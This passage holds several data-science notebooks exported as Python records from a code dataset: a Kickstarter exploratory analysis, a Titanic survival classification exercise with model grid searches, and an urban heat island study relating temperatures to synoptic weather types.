Let's keep them in our dataset for now.\n\n# + [markdown] _uuid=\"e86bea97ea895f840e181f840f63ce59d0f06bda\"\n# ## EDA\n\n# + [markdown] _uuid=\"d9bd7520b975067d9faa7a805f8cbdf2d9b031ab\"\n# ### Most popular categories\n\n# + [markdown] _uuid=\"5489c87f81880cab4b733cd23444add8e4eb7976\"\n# The 'category' and 'main_category' features are distinct but have a lot of overlap. However, the 'category' feature is much more diverse. Both can be useful for our analysis.\n\n# + _uuid=\"ab63b7cd6809abd702d9d341cfa7178d2b306d62\"\nprint('Categories in category: ', df['category'].nunique())\ndf['category'].value_counts()[:20].plot(kind='barh')\n\n# + _uuid=\"d5c49c55ddbfe7853d2e2f2c713255700d8246fa\"\nprint('Categories in main_category: ', df['main_category'].nunique())\ndf['main_category'].value_counts().plot(kind='barh')\n\n# + [markdown] _uuid=\"b51c4ef50176905aefceb797a02456b942cb18e0\"\n# ### Countries\n\n# + [markdown] _uuid=\"71ee3f4dcd5989f48c12083d69f9cb3d02e8cda7\"\n# ![](https://www.nationsonline.org/gallery/Flags/Flags-of-the-World.jpg)\n\n# + [markdown] _uuid=\"e66b62cb3da15e70f97420048cd8c10ab32a12f3\"\n# It is clear to see that most Kickstarter campaigns in our dataset are from the United States or Great Britain.\n\n# + _uuid=\"76f1c71b27ca5ffc4cbc02201f1e14e315d8ff80\"\nprint('Number of unique countries: ', df['country'].nunique())\ndf['country'].value_counts()[:10].plot(kind='barh')\n\n# + [markdown] _uuid=\"8b00138da836c8bc5c7f61a80e36551f8299efe0\"\n# ### Money!\n\n# + _uuid=\"f87bd87037e0bc6729e0024255a1234c0481e13b\"\nprint('The average Kickstarter campaign has {} USD pledged, {} backers and a goal of {} USD.'.format(round(df['usd_pledged_real'].mean(), 2),\n int(df['backers'].mean()),\n round(df['goal'].mean(), 2)))\n\n# + _uuid=\"c3bf1b843d46b7501bf7f0df1f86608cc4ca5fed\"\ndf['discrepancy'] = df['goal'] - df['usd_pledged_real']\ndf['target_reached'] = df['discrepancy'] <= 0\n\ntarget_reached = df.loc[lambda df: df['target_reached'] == True]\ntarget_not_reached = df.loc[lambda df: df['target_reached'] == False]\ntarget_reached_perc = round(len(target_reached) / len(df) * 100, 2)\ntarget_not_reached_perc = round(len(target_not_reached) / len(df) * 100, 2)\n\nprint('Out of {} Kickstarter campaigns:\\n\\n{} % reached their target.'.format(len(df), \n target_reached_perc))\nprint('For the {} campaigns that reached their target,\\n\\\nthere was on average {} USD pledged more than the target.\\n'.format(len(target_reached), \n round(target_reached['usd_pledged_real'].mean(), 2)))\n\nprint('{} % of the campaigns did not reach their target.\\n\\\nFor the {} campaigns that did not reach their target,\\n\\\nthere was on average {} USD pledged less than the target.'.format(target_not_reached_perc, \n len(target_not_reached), \n round(target_not_reached['usd_pledged_real'].mean(), 2)))\n\n# + _uuid=\"8a86e0071bcbeb4a1dad6068b60063e672389a13\"\ndf['currency'].value_counts().plot(kind='barh')\n\n# + [markdown] _uuid=\"73e3447794a1282cf149b9ace6babff185399787\"\n# It should be obvious that there is a correlation between the countries and currencies used. 
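\n#\n# As a quick sanity check of that claim, the sketch below cross-tabulates the two columns. It reuses the 'country' and 'currency' columns of the `df` loaded above; `pd.crosstab` is standard pandas, and no specific counts are asserted here.\n\n# +\n# Cross-tab of country vs. currency: if the claim holds, each of the largest countries\n# should concentrate almost all of its campaigns in its home currency (e.g. US and USD).\ncountry_currency = pd.crosstab(df['country'], df['currency'])\n# show the five countries with the most campaigns and how they split across currencies\nprint(country_currency.loc[country_currency.sum(axis=1).nlargest(5).index])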
\n\n# + [markdown] _uuid=\"5c76d7d5718b5e1910fa4ed21e242e120b974a97\"\n# ### States\n\n# + _uuid=\"cdaae8af0ea4243c377764f60ffb46bf645c3f3f\"\ndf['state'].value_counts().plot(kind='barh')\n\nperc_successful = len(df[df['state'] == 'successful']) / len(df) * 100\nperc_failed = len(df[df['state'] == 'failed']) / len(df) * 100\nperc_canceled = len(df[df['state'] == 'canceled']) / len(df) * 100\nperc_other = 100 - (perc_successful + perc_failed + perc_canceled)\n\nprint('{} % of campaigns were successful\\n\\\n{} % of campaigns failed\\n\\\n{} % of campaigns were canceled\\n\\\n{} % of campaigns belong to other categories'.format(round(perc_successful, 2), \n round(perc_failed, 2), \n round(perc_canceled, 2), \n round(perc_other, 2)))\n\n# + [markdown] _uuid=\"8a7a8a422d3e6aca9d46fb3916834aab224880e5\"\n# Note: There is a slight difference between campaigns that reached their target and what the data calls 'successful' campaigns. A campaigns can for example have reached its target but still be live. A campaign can also not reach its target but belong to a 'canceled' state.\n\n# + [markdown] _uuid=\"2c173e39885f0a7eb24cf4312e0cabab75fc5fa7\"\n# # Work in progress\n\n# + _uuid=\"1ad9ac867b9f924ef3da0d1898c393f759eab4d7\"\n##### Ideas for this Kernel ######\n# Correlations\n# Top Kickstarter campaigns (What do they have in common)\n# Categories that are cashing the most\n# Outlier analysis\n# Preparation for machine learning (one-hot encoding)\n# Predicting usd_pledged\n# Feature importance\n# Tree interpreter\n# Partial Dependence\n# Extrapolation\n# Confidence based on tree variance\n###################################\n\n","repo_name":"peppyguy/u-kaggle","sub_path":"src/data/dataset/exploration-of-kickstarter-data-work-in-progress.ipynb","file_name":"exploration-of-kickstarter-data-work-in-progress.ipynb","file_ext":"py","file_size_in_byte":9513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"25907353081","text":"import pandas as pd\nimport numpy as np\n\ndf_train=pd.read_csv('/Users/genie/Desktop/titanic/train.csv')\ndf_test=pd.read_csv('/Users/genie/Desktop/titanic/test.csv')\n\ndf_train[:5]\n\n# a) \n# True\n# True\n# True\n# False\n\ndf1=df_train[(df_train.Parch == 0)]\nlen(df1)/len(df_train)\n\ndf2=df_train[(df_train.SibSp != 0)]\nlen(df2)/len(df_train)\n\ndf3=df_train[(df_train.Fare >= 500)]\nlen(df3)/len(df_train)\n\ndf4=df_train[(df_train.Age >= 65)]\nlen(df4)/len(df_train)\n\n\n# b)\n\ndef fill_nas(df):\n df=df.drop(['PassengerId','Name','Ticket','Cabin'],axis=1)\n df['Embarked'] = df['Embarked'].fillna(df['Embarked'].mode()[0])\n df['Fare'] = df['Fare'].fillna(df['Fare'].median())\n df['Age'] = df.groupby(['Pclass', 'Sex'])['Age'].transform(lambda x: x.fillna(x.median()))\n return(df)\n\n\ndf_train2=fill_nas(df_train)\ndf_train_poly=df_train2.copy()\ndf_train2[:5]\n\ndf_test2=fill_nas(df_test)\ndf_test_poly=df_test2.copy()\ndf_test2[:5]\n\n\n# c)\n\ndef data_prep(df):\n conditions = [\n (df['Age'] <= 16),\n (df['Age'] > 16) & (df['Age'] <= 32),\n (df['Age'] > 32) & (df['Age'] <= 48),\n (df['Age'] > 48) & (df['Age'] <= 64),\n (df['Age'] > 64) & (df['Age'] <= 100)\n ]\n values = ['1', '2', '3', '4', '5']\n df['AgeRange'] = np.select(conditions, values)\n conditions2 = [\n (df['Fare'] <= 7.9),\n (df['Fare'] > 7.9) & (df['Fare'] <= 14.5),\n (df['Fare'] > 14.5) & (df['Fare'] <= 31),\n (df['Fare'] > 31) & (df['Fare'] <= 600)\n ]\n values2 = ['1', '2', '3', '4']\n df['FareRange'] = np.select(conditions2, values2)\n 
df['Size']=df['SibSp']+df['Parch']\n df=df.drop(['SibSp','Parch','Age','Fare'],axis=1)\n df['Alone'] = np.where(df['Size'] == 0, 1, 0)\n print(df.dtypes)\n df=pd.get_dummies(df, columns = ['Sex','Embarked','AgeRange','FareRange'], drop_first=True)\n return(df)\n\n\ndf_train3=data_prep(df_train2)\ndf_train3[:5]\n\ndf_test3=data_prep(df_test2)\ndf_test3[:5]\n\n# d)\n\nx=df_train3.drop(['Survived'],axis=1)\ny=df_train3['Survived']\nx.head()\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test=train_test_split(x,y,stratify=y,random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nscaler.fit(x_train[['Pclass','Size','Alone']])\nx_train_scaled=x_train.copy()\nx_train_scaled[['Pclass','Size','Alone']]=scaler.transform(x_train[['Pclass','Size','Alone']])\nx_test_scaled=x_test.copy()\nx_test_scaled[['Pclass','Size','Alone']]=scaler.transform(x_test[['Pclass','Size','Alone']])\ndf_test3_scaled=df_test3.copy()\ndf_test3_scaled[['Pclass','Size','Alone']]=scaler.transform(df_test3[['Pclass','Size','Alone']])\nx_train_scaled[:5]\n\nx_knn=x[['Pclass','Size','Alone']].copy()\nx_knn[:5]\n\ndf_test_knn=df_test3[['Pclass','Size','Alone']].copy()\ndf_test_knn[:5]\n\nx_train_knn, x_test_knn, y_train_knn, y_test_knn=train_test_split(x_knn,y,stratify=y,random_state=0)\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler2=MinMaxScaler()\nscaler2.fit(x_train_knn)\nx_train_knn_scaled=scaler2.transform(x_train_knn)\nx_test_knn_scaled=scaler2.transform(x_test_knn)\ndf_test_knn_scaled=scaler2.transform(df_test_knn)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nparams1={'n_neighbors':list(range(1,21))}\nknn=KNeighborsClassifier()\ngrid_search1=GridSearchCV(knn,param_grid=params1,\n cv=5,\n return_train_score=True)\ngrid_search1.fit(x_train_knn_scaled,y_train_knn)\nbest_neighbors=grid_search1.best_estimator_.n_neighbors\nprint(best_neighbors)\n\nbest_knn=KNeighborsClassifier(n_neighbors=best_neighbors)\nbest_knn.fit(x_train_knn_scaled, y_train_knn)\nbest_knn.score(x_test_knn_scaled, y_test_knn)\n\nfrom sklearn.svm import SVC\nparams2={'kernel':['linear','poly','rbf','sigmoid'],\n 'C':[0.01,0.1,1,10,100],\n 'gamma':[0.5,1,2,3,4]}\nsvc=SVC()\ngrid_search2=GridSearchCV(svc,param_grid=params2,\n cv=5,\n return_train_score=True)\ngrid_search2.fit(x_train_scaled,y_train)\nbest_C=grid_search2.best_estimator_.C\nbest_kernel=grid_search2.best_estimator_.kernel\nbest_gamma=grid_search2.best_estimator_.gamma\nprint(best_C)\nprint(best_kernel)\nprint(best_gamma)\n\nbest_svc=SVC(C=best_C,kernel=best_kernel,gamma=best_gamma)\nbest_svc.fit(x_train_scaled, y_train)\nbest_svc.score(x_test_scaled, y_test)\n\nfrom sklearn.linear_model import LogisticRegression\nparams3={'C':list(10**np.linspace(0,20,21))}\nlogistic=LogisticRegression(solver='lbfgs',max_iter=1000)\ngrid_search3=GridSearchCV(logistic,param_grid=params3,\n cv=5,\n return_train_score=True)\ngrid_search3.fit(x_train,y_train)\nbest_C2=grid_search3.best_estimator_.C\nprint(best_C2)\n\nbest_logistic=LogisticRegression(C=best_C2,solver='lbfgs',max_iter=1000)\nbest_logistic.fit(x_train, y_train)\nbest_logistic.score(x_test, y_test)\n\nfrom sklearn.ensemble import RandomForestClassifier\nparams4={'max_features':list(range(1,14,2)),\n 'max_depth':list(range(4,9,2)),\n 'n_estimators':[100,300,500]}\nforest=RandomForestClassifier(random_state=0)\ngrid_search4=GridSearchCV(forest,param_grid=params4,\n cv=5,\n 
return_train_score=True)\ngrid_search4.fit(x_train,y_train.values.ravel())\nbest_features=grid_search4.best_estimator_.max_features\nbest_depth=grid_search4.best_estimator_.max_depth\nbest_estimators=grid_search4.best_estimator_.n_estimators\nprint(best_features)\nprint(best_depth)\nprint(best_estimators)\n\nbest_forest=RandomForestClassifier(max_features=best_features,n_estimators=best_estimators,max_depth=best_depth,random_state=0)\nbest_forest.fit(x_train,y_train.values.ravel())\nbest_forest.score(x_test,y_test)\n\nfrom sklearn.ensemble import GradientBoostingClassifier\nparams5={'learning_rate':[0.01, 0.05, 0.1, 0.15, 0.2],\n 'max_depth':list(range(4,9,2)),\n 'n_estimators':[10,25,50]}\ngradient=GradientBoostingClassifier(random_state=0)\ngrid_search5=GridSearchCV(gradient,param_grid=params5,\n cv=5,\n return_train_score=True)\ngrid_search5.fit(x_train,y_train)\nbest_rate=grid_search5.best_estimator_.learning_rate\nbest_depth2=grid_search5.best_estimator_.max_depth\nbest_estimators2=grid_search5.best_estimator_.n_estimators\nprint(best_rate)\nprint(best_depth2)\nprint(best_estimators2)\n\nbest_gradient=GradientBoostingClassifier(learning_rate=best_rate,n_estimators=best_estimators2,max_depth=best_depth2,random_state=0)\nbest_gradient.fit(x_train,y_train)\nbest_gradient.score(x_test,y_test)\n\nfrom sklearn.neural_network import MLPClassifier\nparams6={'hidden_layer_sizes':[[5],[5,5],[5,5,5],[10],[10,10],[10,10,10]],\n 'activation':['identity','logistic','tanh','relu']}\nmlp=MLPClassifier(max_iter=2000,random_state=0)\ngrid_search6=GridSearchCV(mlp,param_grid=params6,\n cv=5,\n return_train_score=True)\ngrid_search6.fit(x_train_scaled,y_train)\nbest_layer=grid_search6.best_estimator_.hidden_layer_sizes\nbest_activation=grid_search6.best_estimator_.activation\nprint(best_layer)\nprint(best_activation)\n\nbest_mlp=MLPClassifier(random_state=0,max_iter=2000,hidden_layer_sizes=best_layer,activation=best_activation)\nbest_mlp.fit(x_train_scaled,y_train)\nbest_mlp.score(x_test_scaled,y_test)\n\ndf_train_poly['Sex']=np.where(df_train_poly['Sex']=='male',1,0)\ndf_train_poly['Size']=df_train_poly['SibSp']+df_train_poly['Parch']\ndf_train_poly=df_train_poly.drop(['Embarked','SibSp','Parch'],axis=1)\nprint(df_train_poly.dtypes)\ndf_train_poly[:5]\n\nx_poly=df_train_poly.drop(['Survived'],axis=1)\ny_poly=df_train_poly['Survived']\nx_poly[:5]\n\ndf_test_poly['Sex']=np.where(df_test_poly['Sex']=='male',1,0)\ndf_test_poly['Size']=df_test_poly['SibSp']+df_test_poly['Parch']\ndf_test_poly=df_test_poly.drop(['Embarked','SibSp','Parch'],axis=1)\nprint(df_test_poly.dtypes)\ndf_test_poly[:5]\n\nx_train_poly, x_test_poly, y_train_poly, y_test_poly=train_test_split(x_poly,y_poly,stratify=y_poly,random_state=0)\n\nfrom sklearn.preprocessing import 
PolynomialFeatures\npoly=PolynomialFeatures()\nx_train_poly2=poly.fit_transform(x_train_poly)\nx_test_poly2=poly.fit_transform(x_test_poly)\ndf_test_poly2=poly.fit_transform(df_test_poly)\n\nx_train_poly2=pd.DataFrame(x_train_poly2,columns=poly.get_feature_names(x_train_poly.columns))\nx_train_poly2[:5]\n\nx_train_poly2=x_train_poly2.drop('1',axis=1)\nx_train_poly2[:5]\n\nx_test_poly2=pd.DataFrame(x_test_poly2,columns=poly.get_feature_names(x_test_poly.columns))\nx_test_poly2[:5]\n\nx_test_poly2=x_test_poly2.drop('1',axis=1)\nx_test_poly2[:5]\n\ndf_test_poly2=pd.DataFrame(df_test_poly2,columns=poly.get_feature_names(df_test_poly.columns))\ndf_test_poly2[:5]\n\ndf_test_poly2=df_test_poly2.drop('1',axis=1)\ndf_test_poly2[:5]\n\ngrid_search7=GridSearchCV(forest,param_grid=params4,\n cv=5,\n return_train_score=True)\ngrid_search7.fit(x_train_poly2,y_train_poly.values.ravel())\nbest_features7=grid_search7.best_estimator_.max_features\nbest_depth7=grid_search7.best_estimator_.max_depth\nbest_estimators7=grid_search7.best_estimator_.n_estimators\nprint(best_features7)\nprint(best_depth7)\nprint(best_estimators7)\n\nbest_poly=RandomForestClassifier(max_features=best_features7,n_estimators=best_estimators7,max_depth=best_depth7,random_state=0)\nbest_poly.fit(x_train_poly2,y_train_poly.values.ravel())\nbest_poly.score(x_test_poly2,y_test_poly)\n\nknn_pred=best_knn.predict(df_test_knn_scaled)\ntest_knn=df_test['PassengerId'].copy()\ntest_knn=pd.DataFrame(test_knn)\ntest_knn['Survived']=knn_pred\ntest_knn.to_csv(\"/Users/genie/Desktop/test_knn.csv\",index=None)\n\nsvc_pred=best_svc.predict(df_test3_scaled)\ntest_svc=df_test['PassengerId'].copy()\ntest_svc=pd.DataFrame(test_svc)\ntest_svc['Survived']=svc_pred\ntest_svc.to_csv(\"/Users/genie/Desktop/test_svc.csv\",index=None)\n\nlogistic_pred=best_logistic.predict(df_test3)\ntest_logistic=df_test['PassengerId'].copy()\ntest_logistic=pd.DataFrame(test_logistic)\ntest_logistic['Survived']=logistic_pred\ntest_logistic.to_csv(\"/Users/genie/Desktop/test_logistic.csv\",index=None)\n\nforest_pred=best_forest.predict(df_test3)\ntest_forest=df_test['PassengerId'].copy()\ntest_forest=pd.DataFrame(test_forest)\ntest_forest['Survived']=forest_pred\ntest_forest.to_csv(\"/Users/genie/Desktop/test_forest.csv\",index=None)\n\ngradient_pred=best_gradient.predict(df_test3)\ntest_gradient=df_test['PassengerId'].copy()\ntest_gradient=pd.DataFrame(test_gradient)\ntest_gradient['Survived']=gradient_pred\ntest_gradient.to_csv(\"/Users/genie/Desktop/test_gradient.csv\",index=None)\n\nmlp_pred=best_mlp.predict(df_test3_scaled)\ntest_mlp=df_test['PassengerId'].copy()\ntest_mlp=pd.DataFrame(test_mlp)\ntest_mlp['Survived']=mlp_pred\ntest_mlp.to_csv(\"/Users/genie/Desktop/test_mlp.csv\",index=None)\n\npoly_pred=best_poly.predict(df_test_poly2)\ntest_poly=df_test['PassengerId'].copy()\ntest_poly=pd.DataFrame(test_poly)\ntest_poly['Survived']=poly_pred\ntest_poly.to_csv(\"/Users/genie/Desktop/test_poly.csv\",index=None)\n\n# e) Kaggle name: Jeannie Gao Date:12/04/2020 Score: 0.78229\n\n# ![Screen%20Shot%202020-12-04%20at%207.49.36%20PM.png](attachment:Screen%20Shot%202020-12-04%20at%207.49.36%20PM.png)\n","repo_name":"JeannieG0301/Kaggle-Titanic","sub_path":"Kaggle-Titanic.ipynb","file_name":"Kaggle-Titanic.ipynb","file_ext":"py","file_size_in_byte":11110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"27457828566","text":"# import libraries\n# %matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as 
plt\nimport pandas as pd\nimport glob\nimport ulmo\nimport os\nimport scipy.spatial\nplt.rcParams.update({'font.size': 18})\nimport matplotlib\n\nfrom scipy import stats\ndef easy_scatter(x,y,title='', xlabel='', ylabel='') : \n# plots x,y (need to be np array) and calculates and prints their best fit line\n ind = ~np.isnan(y) & ~np.isnan(x) # subset values that aren't NaNs\n if type(ind) == pd.core.series.Series : \n N = ind.sum()\n else: \n N = ind.shape\n m,b = np.polyfit(x[ind],y[ind],1)\n r, p = scipy.stats.pearsonr(x[ind], y[ind]) #np.corrcoef(x[ind],y[ind])[0,1]\n plt.scatter(x,y, color = 'grey')\n plt.plot(x, m*x+b, color = 'black')\n plt.title(title)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n # annotate the linear reqression, y = mx+b\n plt.annotate('y = %.2f x + %.2f'%(m,b), xy=(.5, .9), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n plt.annotate('r = %.2f'%(r), xy=(.5, .85), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n plt.annotate('p = %.2f'%(p), xy=(.5, .8), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n plt.annotate('N = %i'%(N), xy=(.5, .75), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n return m, r, p\n\n\n\npaired_df = pd.read_csv('USpairs2005-2015.csv').set_index('City', drop = False)\npaired_df = paired_df[paired_df['Urban distance'] < 0.25]\n\n# +\ncities = paired_df.index\nfilepath = 'data/synopticclassification/'\nstations = pd.read_table('data/synopticclassification/stations.txt', sep = ',')\n# #!mkdir plots/version6/ssc/\nresults_filepath = 'plots/version6/ssc/'\ncols = ['DM', 'DP', 'DT', 'MM', 'MP', 'MT', 'MTP','DMcount', 'DPcount', 'DTcount', 'MMcount', 'MPcount', 'MTcount', 'MTPcount', ]# ['DM', 'DP', 'DT', 'MM', 'MP', 'MT', 'MTP', 'Dry versus Moist p-value']\n# resultsDF = pd.DataFrame(np.ones([len(cities), 7])*np.nan, index = cities, \n# columns=['DM', 'DP', 'DT', 'MM', 'MP', 'MT', 'MTP'])\n# cities = ['Hartford', 'New York', 'Baltimore', 'Philadelphia', \n# #'Washington, D.C.', 'Richmond','Norfolk',\n# #'Providence', 'Buffalo', 'Pittsburgh',\n# ]\nUHI_resultsDF = pd.DataFrame(np.ones([len(cities), len(cols)])*np.nan, index = cities, \n columns=cols)\nurban_resultsDF = pd.DataFrame(np.ones([len(cities), len(cols)])*np.nan, index = cities, \n columns=cols)\nrural_resultsDF = pd.DataFrame(np.ones([len(cities), len(cols)])*np.nan, index = cities, \n columns=cols)\nfor city in paired_df.index: # cities[66:]: #paired_df.iloc[66:].index: #paired_df.index: \n#city = 'Washington'\n print(city)\n ssc_code = stations[stations['Station'].str.contains(city)]['ID'].values\n if city == 'Washington, D.C.': \n ssc_code = np.array(['IAD'])\n if ssc_code.shape[0] > 0: \n file = filepath + ssc_code[0] + '.dbdmt'\n synopticDF = pd.read_table(file, sep = ' ', header = None)\n synopticDF.columns = ['id','date', 'ssc']\n synopticDF.index = pd.PeriodIndex(synopticDF['date'], freq = 'D', name = 'month_period')\n synopticDF['ssc'].loc[synopticDF['ssc']> 60] =6.5\n synopticDF = synopticDF.loc['2000-06-01':]\n\n urbanID = paired_df.loc[city]['Urban station']\n ruralID = paired_df.loc[city]['Rural station']\n # Downloadd from NCDC the station data, using the station ID listed in station list\n urbandata = ulmo.ncdc.ghcn_daily.get_data(urbanID,\n as_dataframe=True, update = False)\n ruraldata = ulmo.ncdc.ghcn_daily.get_data(ruralID,\n as_dataframe=True, update = False)\n rural_tmin = 
pd.to_numeric(ruraldata['TMIN']['2000-01-01':'2015-8-31'].value/10.) #rural tmin\n urban_tmin = pd.to_numeric(urbandata['TMIN']['2000-01-01':'2015-8-31'].value/10.) \n # clean data: eliminate data with flags \n rural_tmin[~ruraldata['TMIN']['qflag'].isnull()] = np.nan\n urban_tmin[~urbandata['TMIN']['qflag'].isnull()] = np.nan\n\n # extract summertime data \n rural_summer = rural_tmin[(rural_tmin.index.month >= 6) & (rural_tmin.index.month <= 8)]\n urban_summer = urban_tmin[(urban_tmin.index.month >= 6) & (urban_tmin.index.month <= 8)]\n\n # clean data: eliminate min temperatures below 4 or above 35\n# rural_summer = rural_summer[(rural_summer>4) & (rural_summer<35)]\n# urban_summer = urban_summer[(urban_summer>4) & (urban_summer < 35)]\n\n\n #calculate UHI\n UHI = urban_summer - rural_summer\n\n #mean_UHI_dry_ssc = UHI[synopticDF['ssc'][synopticDF['ssc']<3].index].mean()\n #mean_UHI_wet_ssc = UHI[synopticDF['ssc'][(synopticDF['ssc']>=4) & (synopticDF['ssc']<6)].index].mean()\n UHI_resultsDF.loc[city, cols ] = [UHI[synopticDF['ssc']==1].mean(), \n UHI[synopticDF['ssc']==2].mean(), \n UHI[synopticDF['ssc']==3].mean(), \n UHI[synopticDF['ssc']==4].mean(),\n UHI[synopticDF['ssc']==5].mean(),\n UHI[synopticDF['ssc']==6].mean(), \n UHI[synopticDF['ssc']==6.5].mean(),\n # counts\n UHI[synopticDF['ssc']==1].shape[0], \n UHI[synopticDF['ssc']==2].shape[0], \n UHI[synopticDF['ssc']==3].shape[0], \n UHI[synopticDF['ssc']==4].shape[0],\n UHI[synopticDF['ssc']==5].shape[0],\n UHI[synopticDF['ssc']==6].shape[0], \n UHI[synopticDF['ssc']==6.5].shape[0],\n ]\n UHI_resultsDF.loc[city, 'Dry versus Moist p-value'] = scipy.stats.ttest_ind(UHI[synopticDF['ssc'] <=3].dropna(),\n UHI[synopticDF['ssc'] >3].dropna())[1]\n \n urban_resultsDF.loc[city, cols] = [urban_summer[synopticDF['ssc']==1].mean(), \n urban_summer[synopticDF['ssc']==2].mean(), \n urban_summer[synopticDF['ssc']==3].mean(), \n urban_summer[synopticDF['ssc']==4].mean(),\n urban_summer[synopticDF['ssc']==5].mean(),\n urban_summer[synopticDF['ssc']==6].mean(), \n urban_summer[synopticDF['ssc']==6.5].mean(), \n # counts\n urban_summer[synopticDF['ssc']==1].shape[0], \n urban_summer[synopticDF['ssc']==2].shape[0], \n urban_summer[synopticDF['ssc']==3].shape[0], \n urban_summer[synopticDF['ssc']==4].shape[0],\n urban_summer[synopticDF['ssc']==5].shape[0],\n urban_summer[synopticDF['ssc']==6].shape[0], \n urban_summer[synopticDF['ssc']==6.5].shape[0], \n ]\n urban_resultsDF.loc[city, 'Dry versus Moist p-value'] = scipy.stats.ttest_ind(urban_summer[synopticDF['ssc'] <=3].dropna(),\n urban_summer[synopticDF['ssc'] >3].dropna())[1]\n\n rural_resultsDF.loc[city, cols] = [rural_summer[synopticDF['ssc']==1].mean(), \n rural_summer[synopticDF['ssc']==2].mean(), \n rural_summer[synopticDF['ssc']==3].mean(), \n rural_summer[synopticDF['ssc']==4].mean(),\n rural_summer[synopticDF['ssc']==5].mean(),\n rural_summer[synopticDF['ssc']==6].mean(), \n rural_summer[synopticDF['ssc']==6.5].mean(),\n # counts\n rural_summer[synopticDF['ssc']==1].shape[0], \n rural_summer[synopticDF['ssc']==2].shape[0], \n rural_summer[synopticDF['ssc']==3].shape[0], \n rural_summer[synopticDF['ssc']==4].shape[0],\n rural_summer[synopticDF['ssc']==5].shape[0],\n rural_summer[synopticDF['ssc']==6].shape[0], \n rural_summer[synopticDF['ssc']==6.5].shape[0], \n ]\n rural_resultsDF.loc[city, 'Dry versus Moist p-value'] = scipy.stats.ttest_ind(rural_summer[synopticDF['ssc'] <=3].dropna(),\n rural_summer[synopticDF['ssc'] >3].dropna())[1]\n\n 
UHI_resultsDF.to_csv(results_filepath+'sscanalysis.csv')\n urban_resultsDF.to_csv(results_filepath+'urban_sscanalysis.csv')\n rural_resultsDF.to_csv(results_filepath+'rural_sscanalysis.csv')\n\n else: \n print('No synoptic station for %s'%city)\nUHI_resultsDF['Dry'] = UHI_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nUHI_resultsDF['DryCount'] = UHI_resultsDF[['DMcount', 'DPcount', 'DTcount']].sum(axis=1)\nUHI_resultsDF['Moist'] = UHI_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nUHI_resultsDF['MoistCount'] = UHI_resultsDF[['MMcount', 'MPcount', 'MTcount', 'MTPcount']].sum(axis=1)\nUHI_resultsDF.to_csv(results_filepath+'UHI_sscanalysis_withcounts.csv')\n\nurban_resultsDF['Dry'] = urban_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nurban_resultsDF['DryCount'] = urban_resultsDF[['DMcount', 'DPcount', 'DTcount']].sum(axis=1)\nurban_resultsDF['Moist'] = urban_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nurban_resultsDF['MoistCount'] = urban_resultsDF[['MMcount', 'MPcount', 'MTcount', 'MTPcount']].sum(axis=1)\nurban_resultsDF.to_csv(results_filepath+'urban_sscanalysis_withcounts.csv')\n\nrural_resultsDF['Dry'] = rural_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nrural_resultsDF['DryCount'] = rural_resultsDF[['DMcount', 'DPcount', 'DTcount']].sum(axis=1)\nrural_resultsDF['Moist'] = rural_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nrural_resultsDF['MoistCount'] = rural_resultsDF[['MMcount', 'MPcount', 'MTcount', 'MTPcount']].sum(axis=1)\nrural_resultsDF.to_csv(results_filepath+'rural_sscanalysis_withcounts.csv')\n# -\n\n\n\nresults_filepath = 'plots/version6/ssc/'\nind = paired_df[paired_df['Urban distance']<.25].index\nUHI_resultsDF = pd.read_csv(results_filepath+'sscanalysis.csv').set_index('City').loc[ind]\nurban_resultsDF = pd.read_csv(results_filepath+'urban_sscanalysis.csv').set_index('City').loc[ind]\nrural_resultsDF = pd.read_csv(results_filepath+'rural_sscanalysis.csv').set_index('City').loc[ind]\n\nurban_resultsDF['Dry'] = urban_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nurban_resultsDF['Moist'] = urban_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nrural_resultsDF['Dry'] = rural_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nrural_resultsDF['Moist'] = rural_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nUHI_resultsDF['Dry'] = UHI_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nUHI_resultsDF['Moist'] = UHI_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\n\npaired_df[paired_df['Urban Lat'] > 26].shape\n\n# +\nfig = plt.figure(figsize = [16,5])\nax = plt.subplot(121)\ndata = [urban_resultsDF['Moist'].dropna(), urban_resultsDF['Dry'].dropna(), \n rural_resultsDF['Moist'].dropna(), rural_resultsDF['Dry'].dropna(), \n #UHI_resultsDF['Moist'].dropna(), UHI_resultsDF['Dry'].dropna(),\n ]\ndict = plt.boxplot(data)\nplt.ylabel('Temperature ($^\\circ C$)')\nplt.xticks([1,2,3,4,],['$T_{u}( {moist} )$', \n '$T_{u}( {dry} )$',\n '$T_{r}( {moist} )$',\n '$T_{r}( {dry})}$', \n ])\n #rotation = 45)#'vertical')\nxx = 1.25\nfor item in data: \n plt.annotate('%2.2f'%np.mean(item), xy = (xx, np.mean(item)))\n xx = xx+1\nax.set_title('a)')\n \nax2 = plt.subplot(122)\neasy_scatter(rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']),\n urban_resultsDF['Moist'].subtract(urban_resultsDF['Dry']),\n '' ,\n #'$\\Delta T_r$, Moist- Dry ($^\\circ C$)',\n '$\\overline{T}_{r}( {moist}) - \\overline{T}_{r}( {dry} ) $',\n '$\\overline{T}_{u}( {moist} ) - \\overline{T}_{u}( {dry} 